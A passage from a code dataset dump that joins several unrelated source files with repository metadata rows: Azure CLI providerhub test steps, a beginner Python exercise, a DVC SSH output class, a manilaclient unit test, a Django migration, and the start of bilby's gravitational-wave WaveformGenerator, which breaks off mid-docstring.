'--canary regions="EastUS2EUAP" regions="centraluseuap"',
checks=[])
# EXAMPLE: /CustomRollouts/get/CustomRollouts_Get
@try_manual
def step_custom_rollout_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub custom-rollout show '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{customRolloutName}"',
checks=checks)
# EXAMPLE: /CustomRollouts/get/CustomRollouts_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_custom_rollout_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub custom-rollout list '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /DefaultRollouts/put/DefaultRollouts_CreateOrUpdate
@AllowLargeResponse()
@live_only()
def step_default_rollout_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub default-rollout create '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{defaultRolloutName}" '
'--rest-of-the-world-group-two wait-duration="PT2H" '
'--canary skip-regions="centraluseuap"',
checks=checks)
# EXAMPLE: /DefaultRollouts/get/DefaultRollouts_Get
@AllowLargeResponse()
@try_manual
def step_default_rollout_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub default-rollout show '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{defaultRolloutName}"',
checks=checks)
# EXAMPLE: /DefaultRollouts/get/DefaultRollouts_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_default_rollout_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub default-rollout list '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /DefaultRollouts/post/DefaultRollouts_Stop
@try_manual
def step_default_rollout_stop(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub default-rollout stop '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{defaultRolloutName}"',
checks=checks)
# EXAMPLE: /DefaultRollouts/delete/DefaultRollouts_Delete
@try_manual
def step_default_rollout_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub default-rollout delete -y '
'--provider-namespace "{providerNamespace}" '
'--rollout-name "{defaultRolloutName}"',
checks=checks)
# EXAMPLE: /Operations/put/Operations_CreateOrUpdate
@try_manual
def step_operation_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub operation create '
'--contents "[{{\\"name\\":\\"Microsoft.Contoso/Employees/Read\\",\\"display\\":{{\\"description\\":\\"Rea'
'd employees\\",\\"operation\\":\\"Gets/List employee resources\\",\\"provider\\":\\"Microsoft.Contoso\\",'
'\\"resource\\":\\"Employees\\"}}}}]" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /Operations/get/Operations_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_operation_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub operation list '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /Operations/delete/Operations_Delete
@try_manual
def step_operation_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub operation delete -y '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /providerhub/post/CheckinManifest
@try_manual
def step_manifest_checkin(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub manifest checkin '
'--environment "Prod" '
'--baseline-arm-manifest-location "EastUS2EUAP" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /providerhub/post/GenerateManifest
@AllowLargeResponse()
@try_manual
def step_manifest_generate(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub manifest generate '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /ProviderRegistrations/put/ProviderRegistrations_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_provider_registration_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub provider-registration create '
'--providerhub-metadata-authorizations application-id="3d834152-5efa-46f7-85a4-a18c2b5d46f9" '
'role-definition-id="760505bf-dcfa-4311-b890-18da392a00b2" '
'--providerhub-metadata-authentication allowed-audiences="https://management.core.windows.net/" '
'--service-tree-infos service-id="6f53185c-ea09-4fc3-9075-318dec805303" '
'component-id="6f53185c-ea09-4fc3-9075-318dec805303" '
'--capabilities effect="Allow" quota-id="CSP_2015-05-01" '
'--capabilities effect="Allow" quota-id="CSP_MG_2017-12-01" '
'--manifest-owners "SPARTA-PlatformServiceAdministrator" '
'--incident-contact-email "helpme@contoso.com" '
'--incident-routing-service "Contoso Resource Provider" '
'--incident-routing-team "Contoso Triage" '
'--provider-type "Internal, Hidden" '
'--provider-version "2.0" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /ProviderRegistrations/get/ProviderRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_provider_registration_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub provider-registration show '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /ProviderRegistrations/get/ProviderRegistrations_List
@AllowLargeResponse()
@try_manual
def step_provider_registration_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub provider-registration list',
checks=checks)
# EXAMPLE: /ProviderRegistrations/post/ProviderRegistrations_GenerateOperations
@AllowLargeResponse()
@try_manual
def step_provider_registration_generate_operation(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub provider-registration generate-operation '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /ProviderRegistrations/delete/ProviderRegistrations_Delete
@try_manual
def step_provider_registration_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub provider-registration delete -y '
'--provider-namespace "{providerNamespace}" ',
checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub resource-type-registration create '
'--endpoints api-versions="2020-01-01-preview" '
'locations="" required-features="Microsoft.Contoso/RPaaSSampleApp" '
'--regionality "Global" '
'--routing-type "Proxyonly, Extension" '
'--swagger-specifications api-versions="2020-01-01-preview" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/blob/RPSaaSMaster/specification/contoso/resource-manager/Microsoft.Contoso/" '
'--provider-namespace "{providerNamespace}" '
'--enable-async-operation false '
'--enable-third-party-s2s false '
'--resource-type "extensionresourcetype"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_ListByProviderRegistration
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub resource-type-registration list '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_resource_type_registration_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub resource-type-registration show '
'--provider-namespace "{providerNamespace}" '
'--resource-type "employees"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_create(test, checks=None):
if checks is None:
checks = [
test.check("properties.name", "employees/NestedResourceType", case_sensitive=False),
test.check("properties.routingType", "ProxyOnly", case_sensitive=False),
test.check("properties.regionality", "Global", case_sensitive=False)
]
test.cmd('az providerhub resource-type-registration create '
'--endpoints api-versions="2019-01-01" locations="Global" '
'required-features="Microsoft.Contoso/RPaaSSampleApp" extension-endpoint-uri="https://contoso-test-extension-endpoint.com/" extension-categories="ResourceReadValidate" extension-categories="ResourceDeletionValidate" '
'--regionality "Global" '
'--routing-type "ProxyOnly" '
'--swagger-specifications api-versions="2019-01-01" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/tree/RPSaaSMaster/specification/rpsaas/resource-manager/Microsoft.Contoso/" '
'--provider-namespace "{providerNamespace}" '
'--enable-async-operation false '
'--template-deployment-options preflight-supported="true" preflight-options="DefaultValidationOnly" preflight-options="continueDeploymentOnFailure" '
'--resource-type "{resourceType}/{nestedResourceType}"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistration/put/ResourceTypeRegistration_CreateOrUpdate
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_extensions_create(test, checks=None):
if checks is None:
checks = [
test.check("properties.name", "employees/NestedResourceType", case_sensitive=False),
test.check("properties.routingType", "ProxyOnly", case_sensitive=False),
test.check("properties.regionality", "Global", case_sensitive=False)
]
test.cmd('az providerhub resource-type-registration create '
'--endpoints api-versions="2019-01-01" locations="Global" '
'required-features="Microsoft.Contoso/RPaaSSampleApp" extensions=[{{\\"endpointUri\\":\\"https://contoso-test-extension-endpoint.com/\\",\\"extensionCategories\\":[\\"ResourceReadValidate\\",\\"ResourceDeletionValidate\\"]}}] '
'--regionality "Global" '
'--routing-type "ProxyOnly" '
'--swagger-specifications api-versions="2019-01-01" swagger-spec-folder-uri="https://github.com/Azure/azure-rest-api-specs-pr/tree/RPSaaSMaster/specification/rpsaas/resource-manager/Microsoft.Contoso/" '
'--provider-namespace "{providerNamespace}" '
'--enable-async-operation false '
'--template-deployment-options preflight-supported="true" preflight-options="DefaultValidationOnly" preflight-options="continueDeploymentOnFailure" '
'--resource-type "{resourceType}/{nestedResourceType}"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistration/delete/ResourceTypeRegistration_Delete
@try_manual
def step_nested_resource_type_registration_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub resource-type-registration delete -y '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}/{nestedResourceType}"',
checks=checks)
# EXAMPLE: /ResourceTypeRegistrations/get/ResourceTypeRegistrations_Get
@AllowLargeResponse()
@try_manual
def step_nested_resource_type_registration_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub resource-type-registration show '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}/{nestedResourceType}"',
checks=checks)
# EXAMPLE: /NotificationRegistrations/put/NotificationRegistrations_CreateOrUpdate
@try_manual
def step_notification_registration_create(test, checks=None):
if checks is None:
checks = [
test.check("name", "{notificationRegistration}", case_sensitive=False),
test.check("properties.messageScope", "RegisteredSubscriptions", case_sensitive=False),
test.check("properties.notificationMode", "EventHub", case_sensitive=False)
]
test.cmd('az providerhub notification-registration create '
'--name "{notificationRegistration}" '
'--included-events "*/write" "Microsoft.Contoso/employees/delete" '
'--message-scope "RegisteredSubscriptions" '
'--notification-endpoints locations="" locations="East US" notification-destination="/subscriptions/ac6bcfb5-3dc1-491f-95a6-646b89bf3e88/resourceGroups/mgmtexp-eastus/providers/Microsoft.EventHub/namespaces/unitedstates-mgmtexpint/eventhubs/armlinkednotifications" '
'--notification-endpoints locations="East US" notification-destination="/subscriptions/{subscription_'
'id}/resourceGroups/providers/Microsoft.EventHub/namespaces/europe-mgmtexpint/eventhubs/armlinkedno'
'tifications" '
'--notification-mode "EventHub" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /NotificationRegistrations/get/NotificationRegistrations_Get
@try_manual
def step_notification_registration_show(test, checks=None):
if checks is None:
checks = [
test.check("name", "{notificationRegistration}", case_sensitive=False),
test.check("properties.messageScope", "RegisteredSubscriptions", case_sensitive=False),
test.check("properties.notificationMode", "EventHub", case_sensitive=False),
]
test.cmd('az providerhub notification-registration show '
'--name "{notificationRegistration}" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /NotificationRegistrations/get/NotificationRegistrations_ListByProviderRegistration
@try_manual
def step_notification_registration_list(test, checks=None):
if checks is None:
checks = [
test.check('length(@)', 2),
]
test.cmd('az providerhub notification-registration list '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /NotificationRegistrations/delete/NotificationRegistrations_Delete
@try_manual
def step_notification_registration_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub notification-registration delete -y '
'--name "{notificationRegistration}" '
'--provider-namespace "{providerNamespace}"',
checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdate
@try_manual
def step_sku_create(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku create '
'--sku-settings "[{{\\"name\\":\\"freeSku\\"}}]" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeFirst
@try_manual
def step_sku_create2(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku create '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
'\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
'r2\\"}}]" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeSecond
@try_manual
def step_sku_create3(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku create '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
'\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
'r2\\"}}]" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/put/Skus_CreateOrUpdateNestedResourceTypeThird
@try_manual
def step_sku_create4(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku create '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--nested-resource-type-third "nestedResourceTypeThird" '
'--sku-settings "[{{\\"name\\":\\"freeSku\\",\\"kind\\":\\"Standard\\",\\"tier\\":\\"Tier1\\"}},{{\\"name'
'\\":\\"premiumSku\\",\\"costs\\":[{{\\"meterId\\":\\"xxx\\"}}],\\"kind\\":\\"Premium\\",\\"tier\\":\\"Tie'
'r2\\"}}]" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_Get
@try_manual
def step_sku_show(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku show '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeFirst
@try_manual
def step_sku_show_nested_resource_type_first(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku show-nested-resource-type-first '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeSecond
@try_manual
def step_sku_show_nested_resource_type_second(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku show-nested-resource-type-second '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_GetNestedResourceTypeThird
@try_manual
def step_sku_show_nested_resource_type_third(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku show-nested-resource-type-third '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--nested-resource-type-third "nestedResourceTypeThird" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrations
@try_manual
def step_sku_list(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku list '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeFirst
@try_manual
def step_sku_list2(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku list '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeSecond
@try_manual
def step_sku_list3(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku list '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}"',
checks=checks)
# EXAMPLE: /Skus/get/Skus_ListByResourceTypeRegistrationsNestedResourceTypeThird
@try_manual
def step_sku_list4(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku list '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--nested-resource-type-third "nestedResourceTypeThird" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}"',
checks=checks)
# EXAMPLE: /Skus/delete/Skus_Delete
@try_manual
def step_sku_delete(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku delete -y '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeFirst
@try_manual
def step_sku_delete2(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku delete -y '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeSecond
@try_manual
def step_sku_delete3(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku delete -y '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
# EXAMPLE: /Skus/delete/Skus_DeleteNestedResourceTypeThird
@try_manual
def step_sku_delete4(test, checks=None):
if checks is None:
checks = []
test.cmd('az providerhub sku delete -y '
'--nested-resource-type-first "nestedResourceTypeFirst" '
'--nested-resource-type-second "nestedResourceTypeSecond" '
'--nested-resource-type-third "nestedResourceTypeThird" '
'--provider-namespace "{providerNamespace}" '
'--resource-type "{resourceType}" '
'--sku "{skuName}"',
checks=checks)
| 40.65008 | 279 | 0.649753 |
ace06cf53298b3719bf69ac7e005e7c6d62e2b2c | 244 | py | Python | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | PythonExercicios/Mundo 2/ex061.py | gabryelvicthor/Aprendendo-Python | 895c5ef2d93c946d1e61c1820b3d7e09669e59ca | [
"MIT"
] | null | null | null | print('-=' * 8)
print('Gerador de PA')
print('-=' * 8)
p = int(input('Digite o primeiro termo da PA: '))
r = int(input('Digite a razão da PA: '))
i = 0
while not i == 10:
print('{} > '.format(p), end= '')
p += r
i +=1
print('FIM')
| 18.769231 | 49 | 0.516393 |
ace06d2ec9b458657657836e185c6cc6ea4f58e4 | 1,326 | py | Python | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | 1 | 2019-04-16T19:51:03.000Z | 2019-04-16T19:51:03.000Z | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | null | null | null | dvc/output/ssh.py | vyloy/dvc | 60c89adeb5dcc293d8661d6aabeb1da6d05466f5 | [
"Apache-2.0"
] | null | null | null | from __future__ import unicode_literals
import getpass
import posixpath
from dvc.utils.compat import urlparse
from dvc.output.base import OutputBase
from dvc.remote.ssh import RemoteSSH
class OutputSSH(OutputBase):
REMOTE = RemoteSSH
def __init__(
self,
stage,
path,
info=None,
remote=None,
cache=True,
metric=False,
persist=False,
tags=None,
):
super(OutputSSH, self).__init__(
stage,
path,
info=info,
remote=remote,
cache=cache,
metric=metric,
persist=persist,
tags=tags,
)
parsed = urlparse(path)
host = remote.host if remote else parsed.hostname
port = (
remote.port if remote else (parsed.port or RemoteSSH.DEFAULT_PORT)
)
user = (
remote.user if remote else (parsed.username or getpass.getuser())
)
if remote:
path = posixpath.join(
remote.prefix, urlparse(path).path.lstrip("/")
)
else:
path = parsed.path
self.path_info = {
"scheme": "ssh",
"host": host,
"port": port,
"user": user,
"path": path,
}
| 22.862069 | 78 | 0.515837 |
ace06d71e20546895618c8edb4c476b38e02c994 | 1,262 | py | Python | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | manilaclient/tests/unit/v1/test_security_services.py | SolKuczala/python-manilaclient | 9613c7fd2652dc3c7b8793c9af2b6357f42a4757 | [
"CNRI-Python",
"Apache-1.1"
] | null | null | null | # Copyright 2016 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from manilaclient.tests.unit import utils
class SecurityServicesV1Test(utils.TestCase):
def test_import_v1_security_services_module(self):
try:
from manilaclient.v1 import security_services
except Exception as e:
msg = ("module 'manilaclient.v1.security_services' cannot be "
"imported with error: %s") % six.text_type(e)
assert False, msg
for cls in ('SecurityService', 'SecurityServiceManager'):
msg = "Module 'security_services' has no '%s' attr." % cls
self.assertTrue(hasattr(security_services, cls), msg)
| 38.242424 | 78 | 0.690174 |
ace06f63d0476f3531312207bfbe7ec7c1a3629f | 358 | py | Python | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | null | null | null | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | 7 | 2020-06-05T17:46:44.000Z | 2022-03-11T23:17:30.000Z | portfolio/migrations/0011_delete_skill.py | ryandingle09/ryandingle-djangoapp | e99f7fe18ab5cdf95beef26905e77aea07b65e41 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-24 10:59
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('portfolio', '0010_frontcover_image'),
]
operations = [
migrations.DeleteModel(
name='Skill',
),
]
| 18.842105 | 47 | 0.622905 |
ace0703537afbe525e9abaee9fbd3cb997b7b0ce | 10,785 | py | Python | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | bilby/gw/waveform_generator.py | k-ship/bilby | 916d5c4ee4cdb102f1408bd20bc25fa250ab92f0 | [
"MIT"
] | null | null | null | import numpy as np
from ..core import utils
from ..core.series import CoupledTimeAndFrequencySeries
from .utils import PropertyAccessor
class WaveformGenerator(object):
duration = PropertyAccessor('_times_and_frequencies', 'duration')
sampling_frequency = PropertyAccessor('_times_and_frequencies', 'sampling_frequency')
start_time = PropertyAccessor('_times_and_frequencies', 'start_time')
frequency_array = PropertyAccessor('_times_and_frequencies', 'frequency_array')
time_array = PropertyAccessor('_times_and_frequencies', 'time_array')
def __init__(self, duration=None, sampling_frequency=None, start_time=0, frequency_domain_source_model=None,
time_domain_source_model=None, parameters=None,
parameter_conversion=None,
waveform_arguments=None):
""" A waveform generator
Parameters
----------
sampling_frequency: float, optional
The sampling frequency
duration: float, optional
Time duration of data
start_time: float, optional
Starting time of the time array
frequency_domain_source_model: func, optional
A python function taking some arguments and returning the frequency
domain strain. Note the first argument must be the frequencies at
which to compute the strain
time_domain_source_model: func, optional
A python function taking some arguments and returning the time
domain strain. Note the first argument must be the times at
which to compute the strain
parameters: dict, optional
Initial values for the parameters
parameter_conversion: func, optional
Function to convert from sampled parameters to parameters of the
waveform generator. Default value is the identity, i.e. it leaves
the parameters unaffected.
waveform_arguments: dict, optional
A dictionary of fixed keyword arguments to pass to either
`frequency_domain_source_model` or `time_domain_source_model`.
Note: the arguments of frequency_domain_source_model (except the first,
which is the frequencies at which to compute the strain) will be added to
the WaveformGenerator object and initialised to `None`.
"""
self._times_and_frequencies = CoupledTimeAndFrequencySeries(duration=duration,
sampling_frequency=sampling_frequency,
start_time=start_time)
self.frequency_domain_source_model = frequency_domain_source_model
self.time_domain_source_model = time_domain_source_model
self.source_parameter_keys = self.__parameters_from_source_model()
if parameter_conversion is None:
self.parameter_conversion = _default_parameter_conversion
else:
self.parameter_conversion = parameter_conversion
if waveform_arguments is not None:
self.waveform_arguments = waveform_arguments
else:
self.waveform_arguments = dict()
if isinstance(parameters, dict):
self.parameters = parameters
self._cache = dict(parameters=None, waveform=None, model=None)
def __repr__(self):
if self.frequency_domain_source_model is not None:
fdsm_name = self.frequency_domain_source_model.__name__
else:
fdsm_name = None
if self.time_domain_source_model is not None:
tdsm_name = self.time_domain_source_model.__name__
else:
tdsm_name = None
if self.parameter_conversion.__name__ == '_default_parameter_conversion':
param_conv_name = None
else:
param_conv_name = self.parameter_conversion.__name__
return self.__class__.__name__ + '(duration={}, sampling_frequency={}, start_time={}, ' \
'frequency_domain_source_model={}, time_domain_source_model={}, ' \
'parameter_conversion={}, ' \
'waveform_arguments={})'\
.format(self.duration, self.sampling_frequency, self.start_time, fdsm_name, tdsm_name,
param_conv_name, self.waveform_arguments)
def frequency_domain_strain(self, parameters=None):
""" Wrapper to source_model.
Converts self.parameters with self.parameter_conversion before handing it off to the source model.
Automatically refers to the time_domain_source model via NFFT if no frequency_domain_source_model is given.
Parameters
----------
parameters: dict, optional
Parameters to evaluate the waveform for, this overwrites
`self.parameters`.
If not provided will fall back to `self.parameters`.
Returns
-------
array_like: The frequency domain strain for the given set of parameters
Raises
-------
RuntimeError: If no source model is given
"""
return self._calculate_strain(model=self.frequency_domain_source_model,
model_data_points=self.frequency_array,
parameters=parameters,
transformation_function=utils.nfft,
transformed_model=self.time_domain_source_model,
transformed_model_data_points=self.time_array)
def time_domain_strain(self, parameters=None):
""" Wrapper to source_model.
Converts self.parameters with self.parameter_conversion before handing it off to the source model.
Automatically refers to the frequency_domain_source model via INFFT if no frequency_domain_source_model is
given.
Parameters
----------
parameters: dict, optional
Parameters to evaluate the waveform for, this overwrites
`self.parameters`.
If not provided will fall back to `self.parameters`.
Returns
-------
array_like: The time domain strain for the given set of parameters
Raises
-------
RuntimeError: If no source model is given
"""
return self._calculate_strain(model=self.time_domain_source_model,
model_data_points=self.time_array,
parameters=parameters,
transformation_function=utils.infft,
transformed_model=self.frequency_domain_source_model,
transformed_model_data_points=self.frequency_array)
def _calculate_strain(self, model, model_data_points, transformation_function, transformed_model,
transformed_model_data_points, parameters):
if parameters is not None:
self.parameters = parameters
if self.parameters == self._cache['parameters'] and self._cache['model'] == model and \
self._cache['transformed_model'] == transformed_model:
return self._cache['waveform']
if model is not None:
model_strain = self._strain_from_model(model_data_points, model)
elif transformed_model is not None:
model_strain = self._strain_from_transformed_model(transformed_model_data_points, transformed_model,
transformation_function)
else:
raise RuntimeError("No source model given")
self._cache['waveform'] = model_strain
self._cache['parameters'] = self.parameters.copy()
self._cache['model'] = model
self._cache['transformed_model'] = transformed_model
return model_strain
def _strain_from_model(self, model_data_points, model):
return model(model_data_points, **self.parameters)
def _strain_from_transformed_model(self, transformed_model_data_points, transformed_model, transformation_function):
transformed_model_strain = self._strain_from_model(transformed_model_data_points, transformed_model)
if isinstance(transformed_model_strain, np.ndarray):
return transformation_function(transformed_model_strain, self.sampling_frequency)
model_strain = dict()
for key in transformed_model_strain:
if transformation_function == utils.nfft:
model_strain[key], _ = \
transformation_function(transformed_model_strain[key], self.sampling_frequency)
else:
model_strain[key] = transformation_function(transformed_model_strain[key], self.sampling_frequency)
return model_strain
@property
def parameters(self):
""" The dictionary of parameters for source model.
Returns
-------
dict: The dictionary of parameter key-value pairs
"""
return self.__parameters
@parameters.setter
def parameters(self, parameters):
"""
Set parameters, this applies the conversion function and then removes
any parameters which aren't required by the source function.
(set.symmetric_difference is the opposite of set.intersection)
Parameters
----------
parameters: dict
Input parameter dictionary, this is copied, passed to the conversion
